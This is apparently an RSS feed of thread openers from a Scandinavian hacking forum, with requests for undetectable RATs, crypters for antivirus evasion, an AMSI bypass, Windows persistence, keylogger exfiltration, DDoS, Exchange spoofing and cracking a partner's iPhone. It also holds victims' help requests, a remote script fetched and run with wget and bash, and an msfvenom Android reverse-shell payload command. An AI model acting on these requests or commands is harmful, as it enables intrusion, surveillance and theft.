<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[Shellsec - Diskussion]]></title>
		<link>https://www.shellsec.pw/</link>
		<description><![CDATA[Shellsec - https://www.shellsec.pw]]></description>
		<pubDate>Wed, 29 Apr 2026 21:05:05 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[Robocall tjeneste]]></title>
			<link>https://www.shellsec.pw/traad-robocall-tjeneste</link>
			<pubDate>Tue, 13 Apr 2021 21:55:47 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-robocall-tjeneste</guid>
			<description><![CDATA[Noen som vet om en legit robocall tjeneste?]]></description>
			<content:encoded><![CDATA[Noen som vet om en legit robocall tjeneste?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Crypter/Packer]]></title>
			<link>https://www.shellsec.pw/traad-crypter-packer</link>
			<pubDate>Wed, 29 Apr 2020 18:31:13 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-crypter-packer</guid>
			<description><![CDATA[Hvilke crypters / packers kan i anbefale, eller bruger i selv? Betalt eller ubetalt.<br />
Hvad er det nyeste nye for AV evasion?]]></description>
			<content:encoded><![CDATA[Hvilke crypters / packers kan i anbefale, eller bruger i selv? Betalt eller ubetalt.<br />
Hvad er det nyeste nye for AV evasion?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[fast harddisk bogstav]]></title>
			<link>https://www.shellsec.pw/traad-fast-harddisk-bogstav</link>
			<pubDate>Thu, 13 Feb 2020 16:09:59 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-fast-harddisk-bogstav</guid>
			<description><![CDATA[Hey guys <br />
<br />
Kan man gøre sådan at et USB stik altid har det samme bogstaver, eller i hvertfald prøver på at få det samme, lige gyldigt hvilken computer du stikker det i. <br />
<br />
hvis man nu satte den til :X  var der større change for at den altid var den samme.  <br />
<br />
når jeg har den i min stationærer PC hedder den :G <br />
<br />
og når jeg stikker den i min bærbar hedder den :M<br />
<br />
kan man sætte den til at altid at prøve med det samme bogstav først. `?? <br />
<br />
PÅ FORHÅND TAK.]]></description>
			<content:encoded><![CDATA[Hey guys <br />
<br />
Kan man gøre sådan at et USB stik altid har det samme bogstaver, eller i hvertfald prøver på at få det samme, lige gyldigt hvilken computer du stikker det i. <br />
<br />
hvis man nu satte den til :X  var der større change for at den altid var den samme.  <br />
<br />
når jeg har den i min stationærer PC hedder den :G <br />
<br />
og når jeg stikker den i min bærbar hedder den :M<br />
<br />
kan man sætte den til at altid at prøve med det samme bogstav først. `?? <br />
<br />
PÅ FORHÅND TAK.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[misbruge en teamviwer session]]></title>
			<link>https://www.shellsec.pw/traad-misbruge-en-teamviwer-session</link>
			<pubDate>Tue, 12 Nov 2019 18:04:00 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-misbruge-en-teamviwer-session</guid>
			<description><![CDATA[Hey Gruppe<br />
Jeg er uskyldigt offer for en scam gruppe som så gerne vil havde mig til at investere i  cryptovaluta investerings systemer, ...<br />
ok næsten uskyldig, jeg har brugt mig selv lidt som honning.<br />
de kan godt li´ teamviewer, er der nogen der kender til nogen reverse tricks bag en teamviwer session?<br />
jeg har dem i en virtual maskine i en DMZ zone med strenge fw regler for traffik, men hvad kan jeg få ud af dette?<br />
Foreslag??]]></description>
			<content:encoded><![CDATA[Hey Gruppe<br />
Jeg er uskyldigt offer for en scam gruppe som så gerne vil havde mig til at investere i  cryptovaluta investerings systemer, ...<br />
ok næsten uskyldig, jeg har brugt mig selv lidt som honning.<br />
de kan godt li´ teamviewer, er der nogen der kender til nogen reverse tricks bag en teamviwer session?<br />
jeg har dem i en virtual maskine i en DMZ zone med strenge fw regler for traffik, men hvad kan jeg få ud af dette?<br />
Foreslag??]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Rat anbefaling til scam gruppe]]></title>
			<link>https://www.shellsec.pw/traad-rat-anbefaling-til-scam-gruppe</link>
			<pubDate>Tue, 12 Nov 2019 17:56:36 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-rat-anbefaling-til-scam-gruppe</guid>
			<description><![CDATA[Hey Gruppe.<br />
Jeg har igennem længere tid opnået et særligt forhold til en scammer gruppe, så en af dem stoler ubetinget på mig,<br />
kan jeg mærke, så jeg er ret sikker på han vil åbne hvad jeg sender til ham via email, han tror jeg er lidt tilbage, evnesvag, og han er sikker på at han kan udnytte mig.<br />
dette faktum kan jeg jo bruge. så jeg er sikker på jeg har nøgle orderne til at få ham til at klikke på link i en mail.<br />
<br />
Hvad for et tool vil være bedst, som ikke opsnappes af av evt, crunched el . runtime encrypted, som giver mig web cam access og fil adgang, og remote key logging<br />
mange store fine krav, men lidt har også ret, så kan jeg jo bygge vidre, måske...<br />
kunne være fedt fuld adgang til at scanne det net han er på, fordi de er en hel organisation kan jeg hører (call center).<br />
/Foggy]]></description>
			<content:encoded><![CDATA[Hey Gruppe.<br />
Jeg har igennem længere tid opnået et særligt forhold til en scammer gruppe, så en af dem stoler ubetinget på mig,<br />
kan jeg mærke, så jeg er ret sikker på han vil åbne hvad jeg sender til ham via email, han tror jeg er lidt tilbage, evnesvag, og han er sikker på at han kan udnytte mig.<br />
dette faktum kan jeg jo bruge. så jeg er sikker på jeg har nøgle orderne til at få ham til at klikke på link i en mail.<br />
<br />
Hvad for et tool vil være bedst, som ikke opsnappes af av evt, crunched el . runtime encrypted, som giver mig web cam access og fil adgang, og remote key logging<br />
mange store fine krav, men lidt har også ret, så kan jeg jo bygge vidre, måske...<br />
kunne være fedt fuld adgang til at scanne det net han er på, fordi de er en hel organisation kan jeg hører (call center).<br />
/Foggy]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[.Phobos malware dekryptering]]></title>
			<link>https://www.shellsec.pw/traad-phobos-malware-dekryptering--7986</link>
			<pubDate>Sun, 27 Oct 2019 15:24:59 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-phobos-malware-dekryptering--7986</guid>
			<description><![CDATA[Hej.<br />
Jeg har været så uheldig, at få malwaren .phobos ned på pcen. Alt på min PC er dekrypteret. Min eksterne harddisk som var tilsluttet er den vigtigste del af processen. Jeg har alt fra 2000, familie billeder osv. osv. som også er blevet krypteret. PCen er for længst formateret og er oppe og køre uden problemer.<br />
Er der nogen der har været ude for det samme? Jeg har været rundt på alle sider og undersøgt uden held.]]></description>
			<content:encoded><![CDATA[Hej.<br />
Jeg har været så uheldig, at få malwaren .phobos ned på pcen. Alt på min PC er dekrypteret. Min eksterne harddisk som var tilsluttet er den vigtigste del af processen. Jeg har alt fra 2000, familie billeder osv. osv. som også er blevet krypteret. PCen er for længst formateret og er oppe og køre uden problemer.<br />
Er der nogen der har været ude for det samme? Jeg har været rundt på alle sider og undersøgt uden held.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Exchange og external warning]]></title>
			<link>https://www.shellsec.pw/traad-exchange-og-external-warning</link>
			<pubDate>Wed, 23 Oct 2019 08:25:08 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-exchange-og-external-warning</guid>
			<description><![CDATA[Hej...<br />
<br />
Kan man på en eller anden måde snyde en Exchange server, der kører med den der advarsel omkring denne mail er sendt fra en external, til at tro at mailen er fra en intern adresse så boksen ikke kommer?]]></description>
			<content:encoded><![CDATA[Hej...<br />
<br />
Kan man på en eller anden måde snyde en Exchange server, der kører med den der advarsel omkring denne mail er sendt fra en external, til at tro at mailen er fra en intern adresse så boksen ikke kommer?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Powershell eksekvering og AMSI bypass]]></title>
			<link>https://www.shellsec.pw/traad-powershell-eksekvering-og-amsi-bypass</link>
			<pubDate>Thu, 11 Apr 2019 23:33:05 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-powershell-eksekvering-og-amsi-bypass</guid>
			<description><![CDATA[Hej Shellsec<br />
<br />
Der er sjældent diskussioner om tekniske emner herinde, men nu prøver jeg alligevel.<br />
Powershell Empire's stagers bliver opsnappet af windows defender gennem AMSI, hvad jeg kan lurer mig frem til kører den stadig AMSIScanString og ikke kun AMSIScanBuffer, som jeg ellers havde formodet var lukket af Microsoft.<br />
<br />
Jeg mener at jeg kan bypasse AMSIScanBuffer, men jeg har problemer med AMSIScanString. Hvilke obfuskeringsmetoder kender i til, som omgår windows defender AMSI på en fuldt patched windows 10?<br />
<br />
Jeg prøver at lege lidt med Invoke-Obfuscation, dog uden held indtil vidre.<br />
Nuværende Invoke-Obfuscation streng er "Token\All\1,Encoding\1,Launcher\STDIN++\234"]]></description>
			<content:encoded><![CDATA[Hej Shellsec<br />
<br />
Der er sjældent diskussioner om tekniske emner herinde, men nu prøver jeg alligevel.<br />
Powershell Empire's stagers bliver opsnappet af windows defender gennem AMSI, hvad jeg kan lurer mig frem til kører den stadig AMSIScanString og ikke kun AMSIScanBuffer, som jeg ellers havde formodet var lukket af Microsoft.<br />
<br />
Jeg mener at jeg kan bypasse AMSIScanBuffer, men jeg har problemer med AMSIScanString. Hvilke obfuskeringsmetoder kender i til, som omgår windows defender AMSI på en fuldt patched windows 10?<br />
<br />
Jeg prøver at lege lidt med Invoke-Obfuscation, dog uden held indtil vidre.<br />
Nuværende Invoke-Obfuscation streng er "Token\All\1,Encoding\1,Launcher\STDIN++\234"]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Ring0 rootkit]]></title>
			<link>https://www.shellsec.pw/traad-ring0-rootkit</link>
			<pubDate>Thu, 14 Mar 2019 20:28:58 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-ring0-rootkit</guid>
			<description><![CDATA[Hej folkens<br />
<br />
Jeg er blevet infected med et persistent ring0 rootkit, kørende både på min desktop maskine og laptops.<br />
Normal anti-virus / anti-rootkit tools kan ikke finde noget, så jeg tror at rootkittet starter før det aktuelle operativ system.<br />
Jeg har kun skiftet SSD i denne maskine, men det fixede ingenting.<br />
<br />
Jeg har prøvet nærmest alle anti-virus og anti-rootkit tool der ude, men uden held. Men det ligner GMER og PChunter er de eneste tools som finder noget. <br />
Jeg får mærkelige entries i process-tabben under GMER, og har lagt mærke til nogle mærkelige executables kørende blandt processer, men de kører i kernelmode og kan kun blive set af GMER.<br />
<br />
Her er et screenshot af GMER: <a href="https://imgur.com/a/Y69toEm" target="_blank" rel="noopener" class="mycode_url">@imgur</a><br />
Her er en log fra PChunter: <a href="https://pastebin.com/3DYV6Mke" target="_blank" rel="noopener" class="mycode_url">@pastebin</a><br />
<br />
Jeg har prøvet at geninstallere min PC på forskellige måder og har testet med Windows 7, Windows 8.1 og Windows 10. Jeg har b rugt DBAN og PartedMagic til at wipe alle diske, formateret og geinstalleret men jeg bliver ved med at blive infected. Alt førnævnt kommer igen. Mit rig er decent men performer af helvede til og jeg er 100% sikker på det ikke er faulty hardware, fordi jeg har samme behaviour på forskellige maskiner.<br />
 <br />
Enhver feedback ville være fucking fedt, har prøvet så meget og er ved at blive desperat!<br />
<br />
regards,<br />
nomsayin]]></description>
			<content:encoded><![CDATA[Hej folkens<br />
<br />
Jeg er blevet infected med et persistent ring0 rootkit, kørende både på min desktop maskine og laptops.<br />
Normal anti-virus / anti-rootkit tools kan ikke finde noget, så jeg tror at rootkittet starter før det aktuelle operativ system.<br />
Jeg har kun skiftet SSD i denne maskine, men det fixede ingenting.<br />
<br />
Jeg har prøvet nærmest alle anti-virus og anti-rootkit tool der ude, men uden held. Men det ligner GMER og PChunter er de eneste tools som finder noget. <br />
Jeg får mærkelige entries i process-tabben under GMER, og har lagt mærke til nogle mærkelige executables kørende blandt processer, men de kører i kernelmode og kan kun blive set af GMER.<br />
<br />
Her er et screenshot af GMER: <a href="https://imgur.com/a/Y69toEm" target="_blank" rel="noopener" class="mycode_url">@imgur</a><br />
Her er en log fra PChunter: <a href="https://pastebin.com/3DYV6Mke" target="_blank" rel="noopener" class="mycode_url">@pastebin</a><br />
<br />
Jeg har prøvet at geninstallere min PC på forskellige måder og har testet med Windows 7, Windows 8.1 og Windows 10. Jeg har b rugt DBAN og PartedMagic til at wipe alle diske, formateret og geinstalleret men jeg bliver ved med at blive infected. Alt førnævnt kommer igen. Mit rig er decent men performer af helvede til og jeg er 100% sikker på det ikke er faulty hardware, fordi jeg har samme behaviour på forskellige maskiner.<br />
 <br />
Enhver feedback ville være fucking fedt, har prøvet så meget og er ved at blive desperat!<br />
<br />
regards,<br />
nomsayin]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Keylogger]]></title>
			<link>https://www.shellsec.pw/traad-keylogger--6702</link>
			<pubDate>Thu, 14 Mar 2019 16:26:08 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-keylogger--6702</guid>
			<description><![CDATA[Lige et hurtigt spørgsmål ang. en keylogger.<br />
<br />
Hvad ville være den nemmeste måde at sende keylogger data fra en computer til en anden?<br />
<br />
Mail, FTP...?]]></description>
			<content:encoded><![CDATA[Lige et hurtigt spørgsmål ang. en keylogger.<br />
<br />
Hvad ville være den nemmeste måde at sende keylogger data fra en computer til en anden?<br />
<br />
Mail, FTP...?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Typer af persistance]]></title>
			<link>https://www.shellsec.pw/traad-typer-af-persistance</link>
			<pubDate>Tue, 11 Dec 2018 13:54:08 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-typer-af-persistance</guid>
			<description><![CDATA[Hvilke metoder kender i til at opretholde adgang og kode-eksekvering, på windows?<br />
Der findes de standard Registry ændringer, til at køre et program ved startup, det er også muligt at oprette med TaskScheduler. Disse er dog meget udbredt.<br />
Jeg tænker at lege med at modificere filer som ellers bliver kørt ved startup, eller ved start af et program som ofte køres (f.eks. browseren). DLL hijacking eller lign.<br />
Hvilke andre kreative måder kan i komme på? Det er en sjov "øvelse" i at tænke ud af boksen.]]></description>
			<content:encoded><![CDATA[Hvilke metoder kender i til at opretholde adgang og kode-eksekvering, på windows?<br />
Der findes de standard Registry ændringer, til at køre et program ved startup, det er også muligt at oprette med TaskScheduler. Disse er dog meget udbredt.<br />
Jeg tænker at lege med at modificere filer som ellers bliver kørt ved startup, eller ved start af et program som ofte køres (f.eks. browseren). DLL hijacking eller lign.<br />
Hvilke andre kreative måder kan i komme på? Det er en sjov "øvelse" i at tænke ud af boksen.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Ddos]]></title>
			<link>https://www.shellsec.pw/traad-ddos--6513</link>
			<pubDate>Tue, 11 Dec 2018 10:21:23 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-ddos--6513</guid>
			<description><![CDATA[Hej alle brødre og søstre <br />
Jeg leder efter den bedste metode til at ddos nogen har linux kali og vil også gerne så lidt som muligt blive opdaget i det<br />
Så hvad vil i sige er den beste metode]]></description>
			<content:encoded><![CDATA[Hej alle brødre og søstre <br />
Jeg leder efter den bedste metode til at ddos nogen har linux kali og vil også gerne så lidt som muligt blive opdaget i det<br />
Så hvad vil i sige er den beste metode]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Hjælp til word rat infektion]]></title>
			<link>https://www.shellsec.pw/traad-hjaelp-til-word-rat-infektion</link>
			<pubDate>Wed, 24 Oct 2018 16:50:25 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-hjaelp-til-word-rat-infektion</guid>
			<description><![CDATA[Hej<br />
<br />
Jeg søger hjælp til at få fuld adgang til offerets computer, via word dokument <br />
<br />
Har ikke det store kendskab til infektion, så betaler gerne<img style="vertical-align: middle;" src="https://emoji.tapatalk-cdn.com/emoji4.png" /><br />
<br />
//Bobby]]></description>
			<content:encoded><![CDATA[Hej<br />
<br />
Jeg søger hjælp til at få fuld adgang til offerets computer, via word dokument <br />
<br />
Har ikke det store kendskab til infektion, så betaler gerne<img style="vertical-align: middle;" src="https://emoji.tapatalk-cdn.com/emoji4.png" /><br />
<br />
//Bobby]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Termux - Metasploit - Directory nonexisting]]></title>
			<link>https://www.shellsec.pw/traad-termux-metasploit-directory-nonexisting</link>
			<pubDate>Thu, 06 Sep 2018 13:21:49 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-termux-metasploit-directory-nonexisting</guid>
			<description><![CDATA[Hey Shellsec <br />
Fandt det her dejlige Android linux emulator (Termux) og har leget lidt rundt med det.<br />
fik installeret metasploit ved at bruge:<br />
<br />
"cd &#36;HOME"<br />
"pkg install wget"<br />
"wget <a href="https://auxilus.github.io/metasploit.sh" target="_blank" rel="noopener" class="mycode_url">https://auxilus.github.io/metasploit.sh</a>"<br />
"bash metasploit.sh"<br />
<br />
 og har nu prøvet at lave et RAT. MEN jeg kan ikke finde den rette path<br />
<br />
msfvenom -p android/meterpreter/reverse_tcp LHOST=(MIN IP) LPORT:(Random Port) R&gt; /sdcard/rat.apk<br />
eller /storage/dcim/rat.apk <br />
<br />
jeg bliver ved med at få beskeden at min "Directory nonexisting" <br />
jeg har prøvet at køre "termux-setup-storage" og givet tilladelse på telefonen<br />
så problemet er jeg ved ikke hvordan jeg gemmer på den rette path når det er er på en Android enhed]]></description>
			<content:encoded><![CDATA[Hey Shellsec <br />
Fandt det her dejlige Android linux emulator (Termux) og har leget lidt rundt med det.<br />
fik installeret metasploit ved at bruge:<br />
<br />
"cd &#36;HOME"<br />
"pkg install wget"<br />
"wget <a href="https://auxilus.github.io/metasploit.sh" target="_blank" rel="noopener" class="mycode_url">https://auxilus.github.io/metasploit.sh</a>"<br />
"bash metasploit.sh"<br />
<br />
 og har nu prøvet at lave et RAT. MEN jeg kan ikke finde den rette path<br />
<br />
msfvenom -p android/meterpreter/reverse_tcp LHOST=(MIN IP) LPORT:(Random Port) R&gt; /sdcard/rat.apk<br />
eller /storage/dcim/rat.apk <br />
<br />
jeg bliver ved med at få beskeden at min "Directory nonexisting" <br />
jeg har prøvet at køre "termux-setup-storage" og givet tilladelse på telefonen<br />
så problemet er jeg ved ikke hvordan jeg gemmer på den rette path når det er er på en Android enhed]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Rats]]></title>
			<link>https://www.shellsec.pw/traad-rats</link>
			<pubDate>Tue, 28 Aug 2018 03:18:53 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-rats</guid>
			<description><![CDATA[hej SS. Nogle gode rats derude både betalt og gratis?<br />
<br />
Tak på forhånd :)]]></description>
			<content:encoded><![CDATA[hej SS. Nogle gode rats derude både betalt og gratis?<br />
<br />
Tak på forhånd :)]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[RAT via makro?]]></title>
			<link>https://www.shellsec.pw/traad-rat-via-makro</link>
			<pubDate>Wed, 22 Aug 2018 17:58:32 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-rat-via-makro</guid>
			<description><![CDATA[Hej SS.<br />
Jeg er ny til det her RATTING fis, og har lige leget lidt med Eggshell som egentligt fungerer udemærket. <br />
Jeg tænkte på om det er muligt at gøre således, at en kommando bliver kørt i cmd / terminal, når de åbner et word dokument med en macro?<br />
- Skal lige siges at jeg ikke hverken ved om jeg er helt ude og skide, eller om det faktisk kan lade sig gøre; derfor jeg spørger om hjælp. <br />
<br />
Hvis ja, hvordan dælen laver jeg så den macro?]]></description>
			<content:encoded><![CDATA[Hej SS.<br />
Jeg er ny til det her RATTING fis, og har lige leget lidt med Eggshell som egentligt fungerer udemærket. <br />
Jeg tænkte på om det er muligt at gøre således, at en kommando bliver kørt i cmd / terminal, når de åbner et word dokument med en macro?<br />
- Skal lige siges at jeg ikke hverken ved om jeg er helt ude og skide, eller om det faktisk kan lade sig gøre; derfor jeg spørger om hjælp. <br />
<br />
Hvis ja, hvordan dælen laver jeg så den macro?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Novicens desperation]]></title>
			<link>https://www.shellsec.pw/traad-novicens-desperation</link>
			<pubDate>Fri, 20 Jul 2018 10:52:09 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-novicens-desperation</guid>
			<description><![CDATA[Hej herinde. Er der nogen kan fortælle lidt om muligheden for at cracke en persons mobilkode? <br />
Vi snakker en IPhone 6s. <br />
<br />
Jeg er desperat og må have klarhed. Vh<br />
<hr class="mycode_hr" />
<blockquote class="mycode_quote"><cite><span> (20-07-2018, 09:52)</span>Enb Skrev:  <a href="https://www.shellsec.pw/traad-novicens-desperation?pid=51869#pid51869" class="quick_jump"></a></cite>Hej herinde. Er der nogen kan fortælle lidt om muligheden for at cracke en persons mobilkode? <br />
Vi snakker en IPhone 6s. <br />
<br />
Jeg er desperat og må have klarhed. Vh</blockquote><br />
Og med klarhed mener jeg selvfølgelig ift hvad der foregår på min partners telefon. Jeg er for ganmel til at lade tiden gå. Alt hjælp tages imod med største taknemmelighed.]]></description>
			<content:encoded><![CDATA[Hej herinde. Er der nogen kan fortælle lidt om muligheden for at cracke en persons mobilkode? <br />
Vi snakker en IPhone 6s. <br />
<br />
Jeg er desperat og må have klarhed. Vh<br />
<hr class="mycode_hr" />
<blockquote class="mycode_quote"><cite><span> (20-07-2018, 09:52)</span>Enb Skrev:  <a href="https://www.shellsec.pw/traad-novicens-desperation?pid=51869#pid51869" class="quick_jump"></a></cite>Hej herinde. Er der nogen kan fortælle lidt om muligheden for at cracke en persons mobilkode? <br />
Vi snakker en IPhone 6s. <br />
<br />
Jeg er desperat og må have klarhed. Vh</blockquote><br />
Og med klarhed mener jeg selvfølgelig ift hvad der foregår på min partners telefon. Jeg er for ganmel til at lade tiden gå. Alt hjælp tages imod med største taknemmelighed.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[0day hack på min Iphone]]></title>
			<link>https://www.shellsec.pw/traad-0day-hack-paa-min-iphone</link>
			<pubDate>Fri, 18 May 2018 14:03:15 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-0day-hack-paa-min-iphone</guid>
			<description><![CDATA[Hej,<br />
Jeg har ikke vild forstand på IT udover til husbehov. Men hackerne bliver ved med at hacke min iphone. Har den nyeste opdatering fra apple, så vi kan vel godt kalde den for en 0day hack.<br />
<br />
Nogle der kan hjælpe?<br />
<br />
/Jimmi]]></description>
			<content:encoded><![CDATA[Hej,<br />
Jeg har ikke vild forstand på IT udover til husbehov. Men hackerne bliver ved med at hacke min iphone. Har den nyeste opdatering fra apple, så vi kan vel godt kalde den for en 0day hack.<br />
<br />
Nogle der kan hjælpe?<br />
<br />
/Jimmi]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Bedste antivirus?]]></title>
			<link>https://www.shellsec.pw/traad-bedste-antivirus</link>
			<pubDate>Fri, 13 Apr 2018 12:28:58 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-bedste-antivirus</guid>
			<description><![CDATA[Hjælp]]></description>
			<content:encoded><![CDATA[Hjælp]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Mistanke om mulig trojan]]></title>
			<link>https://www.shellsec.pw/traad-mistanke-om-mulig-trojan</link>
			<pubDate>Fri, 24 Nov 2017 23:31:18 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-mistanke-om-mulig-trojan</guid>
			<description><![CDATA[Hey SS. Jeg har en mistanke om at jeg har fået en trojan på min computer. Kender i nogle programmer jeg kan scanne min pc med som kan bekræfte eller afbekræfte mig? Eller vil det nemmeste bare være at få lukket mit kort? Eller en helt tredje ting..?? Har ingen forstand på det her område, så håber i vil være hjælpsomme. På forhånd tak.]]></description>
			<content:encoded><![CDATA[Hey SS. Jeg har en mistanke om at jeg har fået en trojan på min computer. Kender i nogle programmer jeg kan scanne min pc med som kan bekræfte eller afbekræfte mig? Eller vil det nemmeste bare være at få lukket mit kort? Eller en helt tredje ting..?? Har ingen forstand på det her område, så håber i vil være hjælpsomme. På forhånd tak.]]></content:encoded>
		</item>
	</channel>
</rss>